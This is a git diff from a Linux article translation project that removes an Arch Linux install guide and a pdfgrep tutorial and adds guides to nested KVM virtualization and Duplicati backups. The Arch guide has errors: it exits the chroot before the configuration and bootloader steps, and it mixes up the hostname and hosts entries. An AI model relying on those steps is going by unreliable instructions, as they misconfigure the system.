[1]:https://i0.wp.com/blog.docker.com/wp-content/uploads/950cf948-7c08-4df6-afd9-cc9bc417cabe-6.jpg?resize=400%2C120&ssl=1
|
||||
[2]:https://i1.wp.com/blog.docker.com/wp-content/uploads/4a7666e4-ebdb-4a40-b61a-26ac7c3f663e-4.jpg?resize=906%2C470&ssl=1 (containerd)
|
||||
[3]:https://i1.wp.com/blog.docker.com/wp-content/uploads/2a73a4d8-cd40-4187-851f-6104ae3c12ba-1.jpg?resize=1140%2C680&ssl=1
|
||||
[4]:https://github.com/containerd/containerd/blob/master/api/services/tasks/v1/tasks.proto
|
||||
[5]:https://blog.mobyproject.org/where-are-containerds-graph-drivers-145fc9b7255
|
||||
[6]:https://github.com/containerd/containerd/blob/master/api/services/snapshots/v1/snapshots.proto
|
||||
[7]:https://blog.mobyproject.org/introducing-buildkit-17e056cc5317
|
||||
[8]:https://i1.wp.com/blog.docker.com/wp-content/uploads/d0fb5eb9-c561-415d-8d57-e74442a879a2-1.jpg?resize=1140%2C556&ssl=1
|
||||
[9]:https://speakerdeck.com/stevvooe/whats-happening-with-containerd-and-the-cri
|
||||
[10]:https://github.com/containerd/containerd/pull/1748
|
@ -1,283 +0,0 @@
|
||||
How to Install Arch Linux [Step by Step Guide]
|
||||
======
|
||||
**Brief: This tutorial shows you how to install Arch Linux in easy to follow steps.**
|
||||
|
||||
[Arch Linux][1] is a x86-64 general-purpose Linux distribution which has been popular among the [DIY][2] enthusiasts and hardcore Linux users. The default installation covers only a minimal base system and expects the end user to configure and use it. Based on the KISS - Keep It Simple, Stupid! principle, Arch Linux focus on elegance, code correctness, minimalist system and simplicity.
|
||||
|
||||
Arch Linux supports the Rolling release model and has its own package manager - [pacman][3]. With the aim to provide a cutting-edge operating system, Arch never misses out to have an up-to-date repository. The fact that it provides a minimal base system gives you a choice to install it even on low-end hardware and then install only the required packages over it.
|
||||
|
||||
Also, its one of the most popular OS for learning Linux from scratch. If you like to experiment with a DIY attitude, you should give Arch Linux a try. It's what many Linux users consider a core Linux experience.
|
||||
|
||||
In this article, we will see how to install and set up Arch Linux and then a desktop environment over it.
|
||||
|
||||
## How to install Arch Linux
|
||||
|
||||
![How to install Arch Linux][4]
|
||||
|
||||
![How to install Arch Linux][5]
|
||||
|
||||
The method we are going to discuss here **wipes out existing operating system** (s) from your computer and install Arch Linux on it. So if you are going to follow this tutorial, make sure that you have backed up your files or else you'll lose all of it. You have been warned.
|
||||
|
||||
But before we see how to install Arch Linux from a USB, please make sure that you have the following requirements:
|
||||
|
||||
### Requirements for installing Arch Linux:
|
||||
|
||||
* A x86_64 (i.e. 64 bit) compatible machine
|
||||
* Minimum 512 MB of RAM (recommended 2 GB)
|
||||
* At least 1 GB of free disk space (recommended 20 GB for basic usage)
|
||||
* An active internet connection
|
||||
* A USB drive with minimum 2 GB of storage capacity
|
||||
* Familiarity with Linux command line
|
||||
|
||||
|
||||
|
||||
Once you have made sure that you have all the requirements, let's proceed to install Arch Linux.
|
||||
|
||||
### Step 1: Download the ISO
|
||||
|
||||
You can download the ISO from the [official website][6]. Arch Linux requires a x86_64 (i.e. 64 bit) compatible machine with a minimum of 512 MB RAM and 800 MB disk space for a minimal installation. However, it is recommended to have 2 GB of RAM and at least 20 GB of storage for a GUI to work without hassle.
|
||||
|
||||
### Step 2: Create a live USB of Arch Linux
|
||||
|
||||
We will have to create a live USB of Arch Linux from the ISO you just downloaded.
|
||||
|
||||
If you are on Linux, you can use **dd command** to create a live USB. Replace /path/to/archlinux.iso with the path where you have downloaded ISO file, and /dev/sdx with your drive in the example below. You can get your drive information using [lsblk][7] command.
|
||||
```
|
||||
dd bs=4M if=/path/to/archlinux.iso of=/dev/sdx status=progress && sync
|
||||
```
|
||||
|
||||
On Windows, there are several tools to create a live USB. The recommended tool is Rufus. We have already covered a tutorial on [how to create a live USB of Antergos Linux using Rufus][8] in the past. Since Antergos is based on Arch, you can follow the same tutorial.
|
||||
|
||||
### Step 3: Boot from the live USB
|
||||
|
||||
Once you have created a live USB for Arch Linux, shut down your PC. Plugin your USB and boot your system. While booting keep pressing F2, F10 or F1dependinging upon your system) to go into boot settings. In here, select to boot from USB or removable disk.
|
||||
|
||||
Once you select that, you should see an option like this:
|
||||
|
||||
![Arch Linux][4]
|
||||
|
||||
![Arch Linux][9]
|
||||
Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user.
|
||||
|
||||
Select Boot Arch Linux (x86_64). After various checks, Arch Linux will boot to login prompt with root user.
|
||||
|
||||
Next steps include partitioning disk, creating the filesystem and mounting it.
|
||||
|
||||
### Step 4: Partitioning the disks
|
||||
|
||||
The first step includes partitioning your hard disk. A single root partition is the simplest one where we will create a root partition (/), a swapfile and home partition.
|
||||
|
||||
I have a 19 GB disk where I want to install Arch Linux. To create a disk, type
|
||||
```
|
||||
fdisk /dev/sda
|
||||
```
|
||||
|
||||
Type "n" for a new partition. Type in "p" for a primary partition and select the partition number.
|
||||
|
||||
The First sector is automatically selected and you just need to press Enter. For Last sector, type the size you want to allocate for this partition.
|
||||
|
||||
Create two more partitions similarly for home and swap, and press 'w' to save the changes and exit.
|
||||
|
||||
![root partition][4]
|
||||
|
||||
![root partition][10]
|
||||
|
||||
### Step 4: Creating filesystem
|
||||
|
||||
Since we have created 3 different partitions, the next step is to format the partition and create a filesystem.
|
||||
|
||||
We will use mkfs for root and home partition and mkswap for creating swap space. We are formatting our disk with ext4 filesystem.
|
||||
```
|
||||
mkfs.ext4 /dev/sda1
|
||||
mkfs.ext4 /dev/sda3
|
||||
|
||||
mkswap /dev/sda2
|
||||
swapon /dev/sda2
|
||||
```
|
||||
|
||||
Lets mount these filesystems to root and home
|
||||
```
|
||||
mount /dev/sda1 /mnt
|
||||
mkdir /mnt/home
|
||||
mount /dev/sda3 /mnt/home
|
||||
```
|
||||
|
||||
### Step 5: Installation
|
||||
|
||||
Since we have created partitioning and mounted it, let's install the base package. A base package contains all the necessary package to run a system, some of which are the GNU BASH shell, data compression tool, file system utilities, C library, compression tools, Linux kernels and modules, library packages, system utilities, USB devices utilities, vi text editor etc.
|
||||
```
|
||||
pacstrap /mnt base base-devel
|
||||
```
|
||||
|
||||
### **Step 6: Configuring the system**
|
||||
|
||||
Generate a fstab file to define how disk partitions, block devices or remote file systems are mounted into the filesystem.
|
||||
```
|
||||
genfstab -U /mnt >> /mnt/etc/fstab
|
||||
```
|
||||
|
||||
Change root into the new system, this allows changing the root directory for the current running process and the child process.
|
||||
```
|
||||
arch-chroot /mnt
|
||||
```
|
||||
|
||||
Some systemd tools which require an active dbus connection can not be used inside a chroot, hence it would be better if we exit from it. To exit chroot, simpy use the below command:
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
### Step 7. Setting Timezone
|
||||
|
||||
Use below command to set the time zone.
|
||||
```
|
||||
ln -sf /usr/share/<zoneinfo>/<Region>/<City> /etc/localtime
|
||||
```
|
||||
|
||||
To get a list of zone, type
|
||||
```
|
||||
ls /usr/share/zoneinfo
|
||||
```
|
||||
|
||||
Run hwclock to set the hardware clock.
|
||||
```
|
||||
hwclock --systohc --utc
|
||||
```
|
||||
|
||||
### Step 8. Setting up Locale.
|
||||
|
||||
File /etc/locale.gen contains all the local settings and system language in a commented format. Open the file using vi editor and un-comment the language you prefer. I had done it for **en_GB.UTF-8**.
|
||||
|
||||
Now generate the locale config in /etc directory file using the commands below:
|
||||
```
|
||||
locale-gen
|
||||
echo LANG=en_GB.UTF-8 > /etc/locale.conf
|
||||
export LANG=en_GB.UTF-8
|
||||
```
|
||||
|
||||
### Step 9. Installing bootloader, setting up hostname and root password
|
||||
|
||||
Create a /etc/hostname file and add a matching entry to host.
|
||||
|
||||
127.0.1.1 myhostname.localdomain myhostname
|
||||
|
||||
I am adding ItsFossArch as a hostname:
|
||||
```
|
||||
echo ItsFossArch > /etc/hostname
|
||||
```
|
||||
|
||||
and then to the /etc/hosts file.
|
||||
|
||||
To install a bootloader use below commands :
|
||||
```
|
||||
pacman -S grub
|
||||
grub-install /dev/sda
|
||||
grub-mkconfig -o /boot/grub/grub.cfg
|
||||
```
|
||||
|
||||
To create root password, type
|
||||
```
|
||||
passwd
|
||||
```
|
||||
|
||||
and enter your desired password.
|
||||
|
||||
Once done, update your system. Chances are that you already have an updated system since you have downloaded the latest ISO file.
|
||||
```
|
||||
pacman -Syu
|
||||
```
|
||||
|
||||
Congratulations! You have successfully installed a minimal command line Arch Linux.
|
||||
|
||||
In the next step, we will see how to set up a desktop environment or Graphical User Interface for the Arch Linux. I am a big fan of GNOME desktop environment, and we will be working on installing the same.
|
||||
|
||||
### Step 10: Install a desktop environment (GNOME in this case)
|
||||
|
||||
Before you can install a desktop environment, you will need to configure the network first.
|
||||
|
||||
You can see the interface name with below command:
|
||||
```
|
||||
ip link
|
||||
```
|
||||
|
||||
![][4]
|
||||
|
||||
![][11]
|
||||
|
||||
For me, it's **enp0s3.**
|
||||
|
||||
Add the following entries in the file
|
||||
```
|
||||
vi /etc/systemd/network/enp0s3.network
|
||||
|
||||
[Match]
|
||||
name=en*
|
||||
[Network]
|
||||
DHCP=yes
|
||||
```
|
||||
|
||||
Save and exit. Restart your systemd network for the changes to reflect.
|
||||
```
|
||||
systemctl restart systemd-networkd
|
||||
systemctl enable systemd-networkd
|
||||
```
|
||||
|
||||
And then add the below two entries in /etc/resolv.conf file.
|
||||
```
|
||||
nameserver 8.8.8.8
|
||||
nameserver 8.8.4.4
|
||||
```
|
||||
|
||||
Next step is to install X environment.
|
||||
|
||||
Type the below command to install the Xorg as display server.
|
||||
```
|
||||
pacman -S xorg xorg-server
|
||||
```
|
||||
|
||||
gnome contains the base GNOME desktop. gnome-extra contains GNOME applications, archive manager, disk manager, text editors and more.
|
||||
```
|
||||
pacman -S gnome gnome-extra
|
||||
```
|
||||
|
||||
The last step includes enabling the display manager GDM for Arch.
|
||||
```
|
||||
systemctl start gdm.service
|
||||
systemctl enable gdm.service
|
||||
```
|
||||
|
||||
Restart your system and you can see the GNOME login screen.
|
||||
|
||||
## Final Words on Arch Linux installation
|
||||
|
||||
A similar approach has been demonstrated in this video (watch in full screen to see the commands) by It's FOSS reader Gonzalo Tormo:
|
||||
|
||||
You might have realized by now that installing Arch Linux is not as easy as [installing Ubuntu][12]. However, with a little patience, you can surely accomplish it and then tell the world that you use Arch Linux.
|
||||
|
||||
Arch Linux installation itself provides a great deal of learning. And once you have installed it, I recommend referring to its comprehensive [wiki][13] where you can find steps to install various other desktop environments and learn more about the OS. You can keep playing with it and see how powerful Arch is.
|
||||
|
||||
Let us know in the comments if you face any difficulty while installing Arch Linux.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/install-arch-linux/
|
||||
|
||||
作者:[Ambarish Kumar][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ambarish/
|
||||
[1] https://www.archlinux.org/
|
||||
[2] https://en.wikipedia.org/wiki/Do_it_yourself
|
||||
[3] https://wiki.archlinux.org/index.php/pacman
|
||||
[4] data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[5] https://itsfoss.com/wp-content/uploads/2017/12/install-arch-linux-featured-800x450.png
|
||||
[6] https://www.archlinux.org/download/
|
||||
[7] https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/deployment_guide/s1-sysinfo-filesystems
|
||||
[8] https://itsfoss.com/live-usb-antergos/
|
||||
[9] https://itsfoss.com/wp-content/uploads/2017/11/1-2.jpg
|
||||
[10] https://itsfoss.com/wp-content/uploads/2017/11/4-root-partition.png
|
||||
[11] https://itsfoss.com/wp-content/uploads/2017/12/11.png
|
||||
[12] https://itsfoss.com/install-ubuntu-1404-dual-boot-mode-windows-8-81-uefi/
|
||||
[13] https://wiki.archlinux.org/
|
@ -1,65 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
How to Search PDF Files from the Terminal with pdfgrep
|
||||
======
|
||||
Command line utilities such as [grep][1] and [ack-grep][2] are great for searching plain-text files for patterns matching a specified [regular expression][3]. But have you ever tried using these utilities to search for patterns in a PDF file? Well, don't! You will not get any result as these tools cannot read PDF files; they only read plain-text files.
|
||||
|
||||
[pdfgrep][4], as the name suggests, is a small command line utility that makes it possible to search for text in a PDF file without opening the file. It is insanely fast - faster than the search provided by virtually all PDF document viewers. A great distinction between grep and pdfgrep is that pdfgrep operates on pages, whereas grep operates on lines. It also prints a single line multiple times if more than one match is found on that line. Let's look at how exactly to use the tool.
|
||||
|
||||
For Ubuntu and other Linux distros based on Ubuntu, it is pretty simple:
|
||||
```
|
||||
sudo apt install pdfgrep
|
||||
```
|
||||
|
||||
For other distros, just provide `pdfgrep` as input for the [package manager][5], and that should get it installed. You can also check out the project's [GitLab page][6], in case you want to play around with the code.
|
||||
|
||||
Now that you have the tool installed, let's go for a test run. pdfgrep command takes this format:
|
||||
```
|
||||
pdfgrep [OPTION...] PATTERN [FILE...]
|
||||
```
|
||||
|
||||
**OPTION** is a list of extra attributes to give the command such as `-i` or `--ignore-case`, which both ignore the case distinction between the regular pattern specified and the once matching it from the file.
|
||||
|
||||
**PATTERN** is just an extended regular expression.
|
||||
|
||||
**FILE** is just the name of the file, if it is in the same working directory, or the path to the file.
|
||||
|
||||
I ran the command on Python 3.6 official documentation. The following image is the result.
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
![pdfgrep search][7]
|
||||
|
||||
The red highlights indicate all the places the word "queue" was encountered. Passing `-i` as option to the command included matches of the word "Queue." Remember, the case does not matter when `-i` is passed as an option.
|
||||
|
||||
pdfgrep has quite a number of interesting options to use. However, I'll cover only a few here.
|
||||
|
||||
* `-c` or `--count`: this suppresses the normal output of matches. Instead of displaying the long output of the matches, it only displays a value representing the number of times the word was encountered in the file
|
||||
* `-p` or `--page-count`: this option prints out the page numbers of matches and the number of occurrences of the pattern on the page
|
||||
* `-m` or `--max-count` [number]: specifies the maximum number of matches. That means when the number of matches is reached, the command stops reading the file.
|
||||
|
||||
|
||||
|
||||
The full list of supported options can be found in the man pages or in the pdfgrep online [documenation][8]. Don't forget pdfgrep can search multiple files at the same time, in case you're working with some bulk files. The default match highlight color can be changed by altering the GREP_COLORS environment variable.
|
||||
|
||||
The next time you think of opening up a PDF file to search for anything. think of using pdfgrep. The tool comes in handy and will save you time.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/search-pdf-files-pdfgrep/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1] https://www.maketecheasier.com/what-is-grep-and-uses/
|
||||
[2] https://www.maketecheasier.com/ack-a-better-grep/
|
||||
[3] https://www.maketecheasier.com/the-beginner-guide-to-regular-expressions/
|
||||
[4] https://pdfgrep.org/
|
||||
[5] https://www.maketecheasier.com/install-software-in-various-linux-distros/
|
||||
[6] https://gitlab.com/pdfgrep/pdfgrep
|
||||
[7] https://www.maketecheasier.com/assets/uploads/2017/11/pdfgrep-screenshot.png (pdfgrep search)
|
||||
[8] https://pdfgrep.org/doc.html
|
@ -0,0 +1,116 @@
|
||||
How to enable Nested Virtualization in KVM on CentOS 7 / RHEL 7
|
||||
======
|
||||
**Nested virtualization** means to configure virtualization environment inside a virtual machine. In other words we can say nested virtualization is a feature in the hypervisor which allows us to install & run a virtual machine inside a virtual server via hardware acceleration from the **hypervisor** (host).
|
||||
|
||||
In this article, we will discuss how to enable nested virtualization in KVM on CentOS 7 / RHEL 7. I am assuming you have already configured KVM hypervisor. In case you have not familiar on how to install and configure **KVM hypervisor** , then refer the following article
|
||||
|
||||
Let's jump into the hypervisor and verify whether nested virtualization is enabled or not on your KVM host
|
||||
|
||||
For Intel based Processors run the command,
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested
|
||||
N
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
For AMD based Processors run the command,
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_amd/parameters/nested
|
||||
N
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
In the above command output 'N' indicates that Nested virtualization is disabled. If we get the output as 'Y' then it indicates that nested virtualization is enabled on your host.
|
||||
|
||||
Now to enable nested virtualization, create a file with the name " **/etc/modprobe.d/kvm-nested.conf** " with the following content.
|
||||
```
|
||||
[root@kvm-hypervisor ~]# vi /etc/modprobe.d/kvm-nested.conf
|
||||
options kvm-intel nested=1
|
||||
options kvm-intel enable_shadow_vmcs=1
|
||||
options kvm-intel enable_apicv=1
|
||||
options kvm-intel ept=1
|
||||
```
|
||||
|
||||
Save & exit the file
|
||||
|
||||
Now remove ' **kvm_intel** ' module and then add the same module with modprobe command. Before removing the module, make sure VMs are shutdown otherwise we will get error message like " **modprobe: FATAL: Module kvm_intel is in use** "
|
||||
```
|
||||
[root@kvm-hypervisor ~]# modprobe -r kvm_intel
|
||||
[root@kvm-hypervisor ~]# modprobe -a kvm_intel
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
Now verify whether nested virtualization feature enabled or not.
|
||||
```
|
||||
[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested
|
||||
Y
|
||||
[root@kvm-hypervisor ~]#
|
||||
```
|
||||
|
||||
####
|
||||
|
||||
Test Nested Virtualization
|
||||
|
||||
Let's suppose we have a VM with name "director" on KVM hypervisor on which I have enabled nested virtualization. Before testing, make sure CPU mode for the VM is either as " **host-model** " or " **host-passthrough** " , to check cpu mode of a virtual machine use either Virt-Manager GUI or virsh edit command
|
||||
|
||||
![cpu_mode_vm_kvm][1]
|
||||
|
||||
![cpu_mode_vm_kvm][2]
|
||||
|
||||
Now login to the director VM and run lscpu and lsmod command
|
||||
```
|
||||
[root@kvm-hypervisor ~]# ssh 192.168.126.1 -l root
|
||||
root@192.168.126.1's password:
|
||||
Last login: Sun Dec 10 07:05:59 2017 from 192.168.126.254
|
||||
[root@director ~]# lsmod | grep kvm
|
||||
kvm_intel 170200 0
|
||||
kvm 566604 1 kvm_intel
|
||||
irqbypass 13503 1 kvm
|
||||
[root@director ~]#
|
||||
[root@director ~]# lscpu
|
||||
```
|
||||
|
||||
![lscpu_command_rhel7_centos7][1]
|
||||
|
||||
![lscpu_command_rhel7_centos7][3]
|
||||
|
||||
Let's try creating a virtual machine either from virtual manager GUI or virt-install inside the director vm, in my case i am using virt-install command
|
||||
```
|
||||
[root@director ~]# virt-install -n Nested-VM --description "Test Nested VM" --os-type=Linux --os-variant=rhel7 --ram=2048 --vcpus=2 --disk path=/var/lib/libvirt/images/nestedvm.img,bus=virtio,size=10 --graphics none --location /var/lib/libvirt/images/CentOS-7-x86_64-DVD-1511.iso --extra-args console=ttyS0
|
||||
Starting install...
|
||||
Retrieving file .treeinfo... | 1.1 kB 00:00:00
|
||||
Retrieving file vmlinuz... | 4.9 MB 00:00:00
|
||||
Retrieving file initrd.img... | 37 MB 00:00:00
|
||||
Allocating 'nestedvm.img' | 10 GB 00:00:00
|
||||
Connected to domain Nested-VM
|
||||
Escape character is ^]
|
||||
[ 0.000000] Initializing cgroup subsys cpuset
|
||||
[ 0.000000] Initializing cgroup subsys cpu
|
||||
[ 0.000000] Initializing cgroup subsys cpuacct
|
||||
[ 0.000000] Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015
|
||||
………………………………………………
|
||||
```
|
||||
|
||||
![cli-installer-virt-install-command-kvm][1]
|
||||
|
||||
![cli-installer-virt-install-command-kvm][4]
|
||||
|
||||
This confirms that nested virtualization has been enabled successfully as we are able to create virtual machine inside a virtual machine.
|
||||
|
||||
This Concludes the article, please do share your feedback and comments.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linuxtechi.com/enable-nested-virtualization-kvm-centos-7-rhel-7/
|
||||
|
||||
作者:[Pradeep Kumar][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linuxtechi.com
|
||||
[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif
|
||||
[2]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cpu_mode_vm_kvm.jpg
|
||||
[3]:https://www.linuxtechi.com/wp-content/uploads/2017/12/lscpu_command_rhel7_centos7-1024x408.jpg
|
||||
[4]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cli-installer-virt-install-command-kvm.jpg
|
@ -0,0 +1,314 @@
|
||||
Personal Backups with Duplicati on Linux
|
||||
======
|
||||
|
||||
This tutorial is for performing personal backups to local USB hard drives, having encryption, deduplication and compression.
|
||||
|
||||
The procedure was tested using [Duplicati 2.0.2.1][1] on [Debian 9.2][2]
|
||||
|
||||
### Duplicati Installation
|
||||
|
||||
Download the latest version from <https://www.duplicati.com/download>
|
||||
|
||||
The software requires several libraries to work, mostly mono libraries. The easiest way to install the software is to let it fail the installation through dpkg and then install the missing packages with apt-get:
|
||||
|
||||
sudo dpkg -i duplicati_2.0.2.1-1_all.deb
|
||||
sudo apt-get --fix-broken install
|
||||
|
||||
Note that the installation of the package fails on the first instance, then we use apt to install the dependencies.
|
||||
|
||||
Start the daemon:
|
||||
|
||||
sudo systemctl start duplicati.service
|
||||
|
||||
And if you wish for it to start automatically with the OS use:
|
||||
|
||||
sudo systemctl enable duplicati.service
|
||||
|
||||
To check that the service is running:
|
||||
|
||||
netstat -ltn | grep 8200
|
||||
|
||||
And you should receive a response like this one:
|
||||
|
||||
[![][3]][4]
|
||||
|
||||
After these steps you should be able to run the browser and access the local web service at http://localhost:8200
|
||||
|
||||
[![][5]][6]
|
||||
|
||||
### Create a Backup Job
|
||||
|
||||
Go to "Add backup" to configure a new backup job:
|
||||
|
||||
[![][7]][8]
|
||||
|
||||
Set a name for the job and a passphrase for encryption. You will need the passphrase to restore files, so pick a strong password and make sure you don't forget it:
|
||||
|
||||
[![][9]][10]
|
||||
|
||||
Set the destination: the directory where you are going to store the backup files:
|
||||
|
||||
[![][11]][12]
|
||||
|
||||
Select the source files to backup. I will pick just the Desktop folder for this example:
|
||||
|
||||
[![][13]][14]
|
||||
|
||||
Specify filters and exclusions if necessary:
|
||||
|
||||
[![][15]][16]
|
||||
|
||||
Configure a schedule, or disable automatic backups if you prefer to run them manually:
|
||||
|
||||
[![][17]][18]
|
||||
|
||||
I like to use manual backups when using USB drive destinations, and scheduled if I have a server to send backups through SSH or a Cloud based destination.
|
||||
|
||||
Specify the versions to keep, and the Upload volume size (size of each partial file):
|
||||
|
||||
[![][19]][20]
|
||||
|
||||
Finally you should see the job created in a summary like this:
|
||||
|
||||
[![][21]][22]
|
||||
|
||||
### Run the Backup
|
||||
|
||||
In the last seen summary, under Home, click "run now" to start the backup job. A progress bar will be seen by the top of the screen.
|
||||
|
||||
After finishing the backup, you can see in the destination folder, a set of files called something like:
|
||||
```
|
||||
duplicati-20171206T143926Z.dlist.zip.aes
|
||||
duplicati-bdfad38a0b1f34b5db56c1de166260cd8.dblock.zip.aes
|
||||
duplicati-i00d8dff418a749aa9d67d0c54b0e4149.dindex.zip.aes
|
||||
```
|
||||
|
||||
The size of the blocks will be the one specified in the Upload volume size option. The files are compressed, and encrypted using the previously set passphrase.
|
||||
|
||||
Once finished, you will see in the summary the last backup taken and the size:
|
||||
|
||||
[![][23]][24]
|
||||
|
||||
In this case it is only 1MB because I took a test folder.
|
||||
|
||||
### Restore Files
|
||||
|
||||
To restore files, simply access the web administration in http://localhost:8200, go to the "Restore" menu and select the backup job name. Then select the files to restore and click "continue":
|
||||
|
||||
[![][25]][26]
|
||||
|
||||
Select the restore files or folders and the restoration options:
|
||||
|
||||
[![][27]][28]
|
||||
|
||||
The restoration will start running, showing a progress bar on the top of the user interface.
|
||||
|
||||
### Fixate the backup destination
|
||||
|
||||
If you use a USB drive to perform the backups, it is a good idea to specify in the /etc/fstab the UUID of the drive, so that it always mount automatically in the /mnt/backup directory (or the directory of your choosing).
|
||||
|
||||
To do so, connect your drive and check for the UUID:
|
||||
|
||||
sudo blkid
|
||||
```
|
||||
...
|
||||
/dev/sdb1: UUID="4d608d85-e138-4546-9f22-4d78bef0b6a7" TYPE="ext4" PARTUUID="983a72cb-01"
|
||||
...
|
||||
```
|
||||
|
||||
And copy the UUID to include an entry in the /etc/fstab file:
|
||||
```
|
||||
...
|
||||
UUID=4d608d85-e138-4546-9f22-4d78bef0b6a7 /mnt/backup ext4 defaults 0 0
|
||||
...
|
||||
```
|
||||
|
||||
### Remote Access to the GUI
|
||||
|
||||
By default, Duplicati listens on localhost only, and it's meant to be that way. However it includes the possibility to add a password and to be accessible from the network:
|
||||
|
||||
[![][29]][30]
|
||||
|
||||
This setting is not recommended, as Duplicati has no SSL capabilities yet. What I would recommend if you need to use the backup GUI remotely, is using an SSH tunnel.
|
||||
|
||||
To accomplish this, first enable SSH server in case you don't have it yet, the easiest way is running:
|
||||
|
||||
sudo tasksel
|
||||
|
||||
[![][31]][32]
|
||||
|
||||
Once you have the SSH server running on the Duplicati host. Go to the computer from where you want to connect to the GUI and set the tunnel
|
||||
|
||||
Let's consider that:
|
||||
|
||||
* Duplicati backups and its GUI are running in the remote host 192.168.0.150 (that we call the server).
|
||||
* The GUI on the server is listening on port 8200.
|
||||
* jorge is a valid user name in the server.
|
||||
* I will access the GUI from a host on the local port 12345.
|
||||
|
||||
|
||||
|
||||
Then to open an SSH tunnel I run on the client:
|
||||
|
||||
ssh -f jorge@192.168.0.150 -L 12345:localhost:8200 -N
|
||||
|
||||
With netstat it can be checked that the port is open for localhost:
|
||||
|
||||
netstat -ltn | grep :12345
|
||||
```
|
||||
tcp 0 0 127.0.0.1:12345 0.0.0.0:* LISTEN
|
||||
tcp6 0 0 ::1:12345 :::* LISTEN
|
||||
```
|
||||
|
||||
And now I can access the remote GUI by accessing http://127.0.0.1:12345 from the client browser
|
||||
|
||||
[![][34]][35]
|
||||
|
||||
Finally if you want to close the connection to the SSH tunnel you may kill the ssh process. First identify the PID:
|
||||
|
||||
ps x | grep "[s]sh -f"
|
||||
```
|
||||
26348 ? Ss 0:00 ssh -f [[email protected]][33] -L 12345:localhost:8200 -N
|
||||
```
|
||||
|
||||
And kill it:
|
||||
|
||||
kill -9 26348
|
||||
|
||||
Or you can do it all in one:
|
||||
|
||||
kill -9 $(ps x | grep "[s]sh -f" | cut -d" " -f1)
|
||||
|
||||
### Other Backup Repository Options
|
||||
|
||||
If you prefer to store your backups on a remote server rather than on a local hard drive, Duplicati has several options. Standard protocols such as:
|
||||
|
||||
* FTP
|
||||
* OpenStack Object Storage / Swift
|
||||
* SFTP (SSH)
|
||||
* WebDAV
|
||||
|
||||
|
||||
|
||||
And a wider list of proprietary protocols, such as:
|
||||
|
||||
* Amazon Cloud Drive
|
||||
* Amazon S3
|
||||
* Azure
|
||||
* B2 Cloud Storage
|
||||
* Box.com
|
||||
* Dropbox
|
||||
* Google Cloud Storage
|
||||
* Google Drive
|
||||
* HubiC
|
||||
* Jottacloud
|
||||
* mega.nz
|
||||
* Microsoft One Drive
|
||||
* Microsoft One Drive for Business
|
||||
* Microsoft Sharepoint
|
||||
* OpenStack Simple Storage
|
||||
* Rackspace CloudFiles
|
||||
|
||||
|
||||
|
||||
For FTP, SFTP, WebDAV is as simple as setting the server hostname or IP address, adding credentials and then using the whole previous process. As a result, I don't believe it is of any value describing them.
|
||||
|
||||
However, as I find it useful for personal matters having a cloud based backup, I will describe the configuration for Dropbox, which uses the same procedure as for Google Drive and Microsoft OneDrive.
|
||||
|
||||
#### Dropbox
|
||||
|
||||
Let's create a new backup job and set the destination to Dropbox. All the configurations are exactly the same except for the destination that should be set like this:
|
||||
|
||||
[![][36]][37]
|
||||
|
||||
Once you set up "Dropbox" from the drop-down menu, and configured the destination folder, click on the OAuth link to set the authentication.
|
||||
|
||||
A pop-up will emerge for you to login to Dropbox (or Google Drive or OneDrive depending on your choosing):
|
||||
|
||||
[![][38]][39]
|
||||
|
||||
After logging in you will be prompted to allow Duplicati app to your cloud storage:
|
||||
|
||||
[![][40]][41]
|
||||
|
||||
After finishing the last process, the AuthID field will be automatically filled in:
|
||||
|
||||
[![][42]][43]
|
||||
|
||||
Click on "Test Connection". When testing the connection you will be asked to create the folder in the case it does not exist:
|
||||
|
||||
[![][44]][45]
|
||||
|
||||
And finally it will give you a notification that the connection is successful:
|
||||
|
||||
[![][46]][47]
|
||||
|
||||
If you access your Dropbox account you will see the files, in the same format that we have seen before, under the defined folder:
|
||||
|
||||
[![][48]][49]
|
||||
|
||||
### Conclusions
|
||||
|
||||
Duplicati is a multi-platform, feature-rich, easy to use backup solution for personal computers. It supports a wide variety of backup repositories what makes it a very versatile tool that can adapt to most personal needs.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
